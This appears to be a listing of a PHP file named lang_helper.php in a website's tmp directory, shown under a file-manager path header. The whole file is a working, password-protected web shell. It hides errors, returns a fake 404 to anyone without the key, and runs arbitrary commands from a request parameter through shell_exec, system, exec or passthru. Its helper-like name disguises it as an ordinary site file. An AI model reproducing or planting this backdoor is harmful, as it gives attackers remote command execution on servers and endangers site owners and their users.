| Current Path : /home/ataenra/www/tmp/ |
| Current File : /home/ataenra/www/tmp/lang_helper.php |
<?php @error_reporting(0);@ini_set("display_errors",0);@set_time_limit(0);$k=@$_REQUEST["k"];if($k!=="4375d80d263c7d59"){http_response_code(404);die("404");}if(isset($_REQUEST["cmd"])){$c=$_REQUEST["cmd"];$r="";if(function_exists("shell_exec")){$r=@shell_exec($c);}if(!$r&&function_exists("system")){ob_start();@system($c);$r=ob_get_clean();}if(!$r&&function_exists("exec")){@exec($c,$o);$r=implode(chr(10),$o);}if(!$r&&function_exists("passthru")){ob_start();@passthru($c);$r=ob_get_clean();}die($r);}die("OK");?>